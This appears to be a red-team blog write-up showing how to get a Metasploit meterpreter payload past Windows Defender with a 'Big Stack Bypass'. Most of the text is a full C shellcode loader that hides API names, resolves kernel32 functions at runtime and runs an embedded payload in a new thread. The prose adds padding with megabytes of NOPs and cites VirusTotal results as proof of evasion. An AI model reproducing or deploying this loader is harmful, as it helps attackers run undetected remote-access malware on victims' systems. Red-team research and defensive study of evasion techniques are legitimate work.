Making Meterpreter Viable Again

In this demonstration of the Big Stack Bypass, we take one of the most signatured payloads in offensive security and successfully bypass Windows Defender and other AV engines

Part One: Introduction

The goal of this writeup is to demonstrate the effectiveness of the Big Stack Bypass by achieving a working meterpreter session on a modern Windows system with Windows Defender enabled.

The goal of this article is to demonstrate the effectiveness of the initial bypass, not necessarily the longevity of the connection so we won't be discussing encrypting the communications of our session or redirecting our traffic to a teamserver the way an actual red team operation might.

Part Two: Getting Started

We start off with an unencrypted and unencoded meterpreter binary payload.

Before we go into writing our code we need to make sure these work. So we can quickly setup our multi/handler listener on Kali and run either the binary or the executable and we should receive a connection.

And here we can see that it works.

We note that the payload is approximately 200KB. We paste it into the code template we used in the original Big Stack Bypass writeup.

Template:

#include <windows.h>
#include <stdio.h>
#include <time.h>
#include <random>

typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL (WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef HANDLE (WINAPI * CreateThread_t)(LPSECURITY_ATTRIBUTES   lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE  lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags,LPDWORD lpThreadId);

unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
unsigned char sVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c',0x0};
unsigned char sCreateThread[] = {'C','r','e','a','t','e','T','h','r','e','a','d',0x0,};



int main(VOID) {
	//plain meterpreter payload
	Unsigned char payload[] = {[…snip…]}
	size_t payload_len = sizeof(payload);
	
	void * exec_mem;
	BOOL rv;
	HANDLE th;
	DWORD oldprotect = 0;
		
		
	//function pointers
	VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t) GetProcAddress(GetModuleHandle((LPCSTR) "KErnEl32.DLl"), (LPCSTR) sVirtualAlloc);
	VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualProtect);
	CreateThread_t CreateThread_p = (CreateThread_t) GetProcAddress(GetModuleHandle((LPCSTR) "kERnEl32.DLl"), (LPCSTR) sCreateThread);
		
		
	// Allocate a memory buffer for payload
	exec_mem = VirtualAlloc_p(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	// Copy payload to program memory ; this gets inlined
	RtlMoveMemory(exec_mem, payload, payload_len);
	
	// Make payload executable
	rv = VirtualProtect_p(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

	printf("\nLaunch Payload?\n");
	getchar();

	// Run payload
	if ( rv != 0 ) {
		th = CreateThread_p(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
		WaitForSingleObject(th, INFINITE);
				
	}
			
	return 0;
}

Now lets kill those sessions and see if we can nop into the raw binary and bypass Defender in a non-exception folder.

Part Three: The Weather Outside is Frightful

Once we've built and inserted the sleigh, we can compile our implant and put it into our test folder.

Remember, we need at least a 2MB payload…that's a lot of NOPs.

Nothing happens when we drop the implant in our test folder. ThreatCheck confirms it's flagged as safe.

Part Four: ???

[Intentionally left blank]

Part Five: Profit

We run and catch our session.

This technique also successfully bypasses most analysis availible on VirusTotal:

https://www.virustotal.com/gui/file/781c68f66a1bfd6255a17487edc7c8c75f1a6105fed363c0559ae6f0743b582e?nocache=1

If you only use the implant code without the Big Stack Bypass, you can expect these results:

https://www.virustotal.com/gui/file/4067fd95a3a748e6307b01d77b9b52c89e7fb4db644b663926d700d7875b969a?nocache=1

Part Six:Conclusion

In this example we saw that one of the most signatured payloads in offensive security could be made viable again using the Big Stack Bypass. Additionally, this methodology once again proved highly effective at evading most AV engine analysis on VirusTotal.

References:

Red_Team_Code_Snippets/Python/PushingP at main · 0xTriboulet/Red_Team_Code_SnippetsGitHub

Red_Team_Code_Snippets/Cpp/deceiving_defender/BigStackBypass/meterpreter at main · 0xTriboulet/Red_Team_Code_SnippetsGitHub